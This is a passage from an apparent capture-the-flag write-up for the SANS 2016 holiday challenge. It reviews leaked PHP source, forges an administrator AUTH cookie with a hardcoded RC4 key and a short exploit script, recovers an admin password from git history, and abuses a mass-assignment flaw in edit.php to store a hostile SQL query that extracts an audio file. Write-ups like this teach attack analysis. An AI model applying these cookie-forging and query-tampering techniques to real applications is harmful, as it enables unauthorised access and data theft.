      &lt;span class="nb"&gt;header&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Location: login.php&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
      &lt;span class="k"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="hll"&gt;    &lt;span class="nx"&gt;check_access&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$username&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$users&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="x"&gt;# File db.php&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="o"&gt;...&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
  &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;get_username&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;isset&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_COOKIE&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;AUTH&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="hll"&gt;    &lt;span class="nv"&gt;$auth&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;json_decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;decrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;pack&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;H*&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nv"&gt;$_COOKIE&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;AUTH&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])),&lt;/span&gt; &lt;span class="k"&gt;true&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$auth&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;username&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="o"&gt;...&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
 &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;check_access&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$username&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$users&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;# Allow administrator to access any page&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$username&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;administrator&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;      &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nb"&gt;in_array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$username&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$users&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;reply&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;403&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Access denied!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
      &lt;span class="k"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;From this source file, we can determine that &lt;code&gt;administrator&lt;/code&gt; has access
to every page, and that the application uses the cookie &lt;code&gt;AUTH&lt;/code&gt; to
determine the current logged in username. Let's see how this cookie is
generated:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="x"&gt;# File login.php&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="o"&gt;...&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Successfully logged in!&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="hll"&gt;    &lt;span class="nv"&gt;$auth&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;encrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;json_encode&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;
&lt;/span&gt;      &lt;span class="s1"&gt;&amp;#39;username&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;username&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
      &lt;span class="s1"&gt;&amp;#39;date&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;date&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;DateTime&lt;/span&gt;&lt;span class="o"&gt;::&lt;/span&gt;&lt;span class="na"&gt;ISO8601&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="p"&gt;]));&lt;/span&gt;

    &lt;span class="nb"&gt;setcookie&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;AUTH&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;bin2hex&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$auth&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

    &lt;span class="nb"&gt;header&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Location: index.php?msg=Successfully%20logged%20in!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="x"&gt;# File crypto.php&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
  &lt;span class="nb"&gt;define&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;KEY&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

  &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;encrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;mcrypt_encrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;MCRYPT_ARCFOUR&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;KEY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;stream&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;

  &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;decrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;mcrypt_decrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;MCRYPT_ARCFOUR&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;KEY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;stream&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;&lt;span class="x"&gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, we can see that the username is stored in a JSON object, stored encrypted
in the cookie &lt;code&gt;AUTH&lt;/code&gt;. Since we have the encryption key in
&lt;code&gt;crypto.php&lt;/code&gt;, we can generate our own cookie:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="k"&gt;include&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;crypto.php&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="nv"&gt;$auth&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;encrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;json_encode&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;
      &lt;span class="s1"&gt;&amp;#39;username&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;administrator&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="s1"&gt;&amp;#39;date&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;date&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;DateTime&lt;/span&gt;&lt;span class="o"&gt;::&lt;/span&gt;&lt;span class="na"&gt;ISO8601&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="p"&gt;]));&lt;/span&gt;

    &lt;span class="k"&gt;echo&lt;/span&gt; &lt;span class="nb"&gt;bin2hex&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$auth&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;&lt;span class="x"&gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; php exploit.php
&lt;span class="go"&gt;82532b2136348aaa1fa7dd2243dc0dc1e10948231f339e5edd5770daf9eef18a4384f6e7bca04d86e573b965cc9c6549b449486763a20363b71876884152&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can now log into the application as administrator:&lt;/p&gt;
&lt;img alt="analytics_administrator_login.png" class="align-center" src="/images/sans-christmas-challenge-2016/analytics_administrator_login.png" /&gt;
&lt;p&gt;There was another, more elegant method, to recover &lt;code&gt;administrator&lt;/code&gt;'s
password. Since we have the Git repository of the web application, we have
access to every file's history. We can see that in the source of the website,
there is an SQL schema file, &lt;code&gt;sprusage.sql&lt;/code&gt;. This file is used to create
a database with the right schema. It's often created with a dump of the
currently deployed database. However, if we take a look at it, we won't see
any data in it, apart from the tables creation instructions:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;DROP&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="k"&gt;IF&lt;/span&gt; &lt;span class="k"&gt;EXISTS&lt;/span&gt; &lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;users&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cm"&gt;/*!40101 SET @saved_cs_client     = @@character_set_client */&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cm"&gt;/*!40101 SET character_set_client = utf8 */&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;users&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;uid&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;11&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt; &lt;span class="nb"&gt;varchar&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;128&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;password&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt; &lt;span class="nb"&gt;varchar&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;128&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="n"&gt;uid&lt;/span&gt;&lt;span class="o"&gt;`&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;ENGINE&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;InnoDB&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="n"&gt;CHARSET&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;latin1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cm"&gt;/*!40101 SET character_set_client = @saved_cs_client */&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;But, if we take a look at the Git log, we can see that the file was &amp;quot;fixed&amp;quot;:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
commit 62547860f9a6e0f3a3bdfd3f9b14fea3ac7f7c31
Author: me &amp;lt;me&amp;#64;example.org&amp;gt;
Date:   Mon Nov 21 21:15:08 2016 -0800

    Fix database dump
&lt;/pre&gt;
&lt;p&gt;Let's see the different modifications made on &lt;code&gt;sprusage.sql&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; git log -p -- ./sprusage.sql
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="go"&gt;commit 62547860f9a6e0f3a3bdfd3f9b14fea3ac7f7c31&lt;/span&gt;
&lt;span class="go"&gt;Author: me &amp;lt;me@example.org&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;Date:   Mon Nov 21 21:15:08 2016 -0800&lt;/span&gt;

&lt;span class="go"&gt;    Fix database dump&lt;/span&gt;

&lt;span class="go"&gt;diff --git a/sprusage.sql b/sprusage.sql&lt;/span&gt;
&lt;span class="go"&gt;index a382229..b948dd0 100644&lt;/span&gt;
&lt;span class="go"&gt;--- a/sprusage.sql&lt;/span&gt;
&lt;span class="go"&gt;+++ b/sprusage.sql&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="go"&gt; LOCK TABLES `users` WRITE;&lt;/span&gt;
&lt;span class="go"&gt; /*!40000 ALTER TABLE `users` DISABLE KEYS */;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;-INSERT INTO `users` VALUES (0,&amp;#39;administrator&amp;#39;,&amp;#39;KeepWatchingTheSkies&amp;#39;),(1,&amp;#39;guest&amp;#39;,&amp;#39;busyllama67&amp;#39;);&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt; /*!40000 ALTER TABLE `users` ENABLE KEYS */;&lt;/span&gt;
&lt;span class="go"&gt; UNLOCK TABLES;&lt;/span&gt;
&lt;span class="go"&gt; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that &lt;code&gt;administrator&lt;/code&gt;'s password is
&lt;code&gt;KeepWatchingTheSkies&lt;/code&gt;. With these credentials, we have another method
of authenticating as &lt;code&gt;administrator&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Anyway, we now have access to the &lt;code&gt;edit.php&lt;/code&gt; page. This means that we can
edit past saved queries. However, we can only modify the name or the
description of the query, as shown on the screenshot above. Let's see this
functionality in action:&lt;/p&gt;
&lt;img alt="analytics_edit_first_use.png" class="align-center" src="/images/sans-christmas-challenge-2016/analytics_edit_first_use.png" /&gt;
&lt;p&gt;Hmm, we can see that the page checks for the presence of some parameters:
&lt;code&gt;name&lt;/code&gt;, &lt;code&gt;description&lt;/code&gt;... and &lt;code&gt;query&lt;/code&gt;! Let's take a look at
the &lt;code&gt;edit.php&lt;/code&gt; file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="k"&gt;else&lt;/span&gt;
  &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;mysqli_query&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;SELECT * FROM `reports` WHERE `id`=&amp;#39;&amp;quot;&lt;/span&gt; &lt;span class="o"&gt;.&lt;/span&gt; &lt;span class="nx"&gt;mysqli_real_escape_string&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;id&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="o"&gt;.&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;#39; LIMIT 0, 1&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nv"&gt;$result&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;reply&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;500&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;MySQL Error: &amp;quot;&lt;/span&gt; &lt;span class="o"&gt;.&lt;/span&gt; &lt;span class="nx"&gt;mysqli_error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$db&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
      &lt;span class="k"&gt;die&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="nv"&gt;$row&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;mysqli_fetch_assoc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$result&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;
    &lt;span class="c1"&gt;# Update the row with the new values&lt;/span&gt;
    &lt;span class="nv"&gt;$set&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[];&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="k"&gt;foreach&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$row&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nv"&gt;$name&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nv"&gt;$value&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;      &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Checking for &amp;quot;&lt;/span&gt; &lt;span class="o"&gt;.&lt;/span&gt; &lt;span class="nb"&gt;htmlentities&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$name&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;.&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;...&amp;lt;br&amp;gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;      &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;isset&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;$name&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Yup!&amp;lt;br&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nv"&gt;$set&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;`&lt;/span&gt;&lt;span class="si"&gt;$name&lt;/span&gt;&lt;span class="s2"&gt;`=&amp;#39;&amp;quot;&lt;/span&gt; &lt;span class="o"&gt;.&lt;/span&gt; &lt;span class="nx"&gt;mysqli_real_escape_string&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;$name&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="o"&gt;.&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;#39;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
      &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that the &lt;code&gt;edit.php&lt;/code&gt; page checks for the presence of every
columns of the &lt;code&gt;reports&lt;/code&gt; table in the &lt;code&gt;GET&lt;/code&gt; parameters. This means
that if we specify a &lt;code&gt;query&lt;/code&gt; &lt;code&gt;GET&lt;/code&gt; parameter, we can modify the
stored SQL query of a specific request!&lt;/p&gt;
&lt;p&gt;By looking the SQL schema file, &lt;code&gt;sprusage.sql&lt;/code&gt;, we can see the format
of the &lt;code&gt;audio&lt;/code&gt; table, containing the coveted audio file. We can now
create our fake query:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;HEX&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;mp3&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;audio&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;administrator&amp;#39;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can now store our malevolent query, and execute it:&lt;/p&gt;
&lt;img alt="analytics_edit_exploit.png" class="align-center" src="/images/sans-christmas-challenge-2016/analytics_edit_exploit.png" /&gt;
&lt;img alt="analytics_edit_exploit_result.png" class="align-center" src="/images/sans-christmas-challenge-2016/analytics_edit_exploit_result.png" /&gt;
&lt;p&gt;We can now recover our hex-encoded audio file, decode it, and get the last
audio file, &lt;code&gt;discombobulatedaudio7.mp3&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="part-5-discombobulated-audio"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id17"&gt;Part 5: Discombobulated Audio&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Now that we've hacked the SantaGram infrastructure, we have our weird audio
files. You can download them here:&lt;/p&gt;
&lt;ul class="simple"&gt;
